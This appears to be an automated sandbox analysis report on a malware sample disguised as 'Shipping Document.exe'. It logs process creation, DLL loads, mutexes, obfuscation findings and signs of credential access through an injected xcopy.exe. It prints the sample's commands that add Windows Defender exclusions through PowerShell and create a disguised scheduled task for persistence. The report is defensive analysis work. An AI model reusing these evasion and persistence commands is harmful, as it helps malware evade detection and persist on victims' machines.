Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Mutant created: \Sessions\1\BaseNamedObjects\XeEALHyTSqlZCHT
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2628:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_03
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
Source: C:\Users\user\Desktop\Shipping Document.exe | File created: C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp
Source: Shipping Document.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\Shipping Document.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Shipping Document.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: xcopy.exe, 00000016.00000002.3688129480.000000000359A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3688129480.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1623169810.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1623169810.000000000359A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Shipping Document.exe | Virustotal: Detection: 35%
Source: Shipping Document.exe | ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\Shipping Document.exe | File read: C:\Users\user\Desktop\Shipping Document.exe
Source: unknown | Process created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"
Source: C:\Users\user\Desktop\Shipping Document.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping Document.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping Document.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping Document.exe | Process created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\KOENBvWt.exe C:\Users\user\AppData\Roaming\KOENBvWt.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Process created: C:\Users\user\AppData\Roaming\KOENBvWt.exe "C:\Users\user\AppData\Roaming\KOENBvWt.exe"
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exeProcess created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Shipping Document.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Shipping Document.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\xcopy.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Shipping Document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Shipping Document.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Shipping Document.exe | Static file information: File size 1199104 > 1048576
Source: Shipping Document.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x108800
Source: Shipping Document.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: xcopy.pdbUGP source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000003.1506541365.0000000000F85000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Shipping Document.exe, 0000000A.00000002.1436632647.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1437540108.0000000003882000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003BCE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1435763271.00000000036D5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Shipping Document.exe, Shipping Document.exe, 0000000A.00000002.1436632647.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1437540108.0000000003882000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003BCE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1435763271.00000000036D5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000003.1506541365.0000000000F85000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358502913.0000000000F0F000.00000002.00000001.01000000.0000000F.sdmp

Data Obfuscation

Source: 0.2.Shipping Document.exe.9bf0000.8.raw.unpack, e6tPm0aIb7UvqPflDt.cs | .Net Code: xfnAkrj3i9 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Shipping Document.exe.41d38f0.6.raw.unpack, e6tPm0aIb7UvqPflDt.cs | .Net Code: xfnAkrj3i9 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Shipping Document.exe.4148ed0.5.raw.unpack, e6tPm0aIb7UvqPflDt.cs | .Net Code: xfnAkrj3i9 System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\Shipping Document.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"
                Source: Shipping Document.exeStatic PE information: 0x99B80416 [Fri Sep 22 05:35:18 2051 UTC]
                Source: Shipping Document.exeStatic PE information: section name: taM%C#%u
                Source: Shipping Document.exeStatic PE information: section name:
                Source: KOENBvWt.exe.0.drStatic PE information: section name: taM%C#%u
                Source: KOENBvWt.exe.0.drStatic PE information: section name:
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 0_2_07FBDD4A push es; ret 0_2_07FBDD4C
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00411946 push ebp; iretd 10_2_00411947
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00405172 push ss; ret 10_2_00405174
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401900 push ss; ret 10_2_00401902
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_004031D0 push eax; ret 10_2_004031D2
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00408208 push eax; retf 10_2_0040820B
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00418238 push ebx; retf 10_2_0041823E
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_004143E1 push cs; iretd 10_2_004143EF
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_004173FA push 36BCB849h; ret 10_2_00417406
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00417407 push 36BCB849h; ret 10_2_00417405
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401D77 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401DE2 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401DE4 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401DF1 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401DF3 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401D8F push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401E00 push ss; ret 10_2_00401D8E
                Source: C:\Users\user\Desktop\Shipping Document.exe | Code function: 10_2_00401E02 push ss; ret 10_2_00401D8E
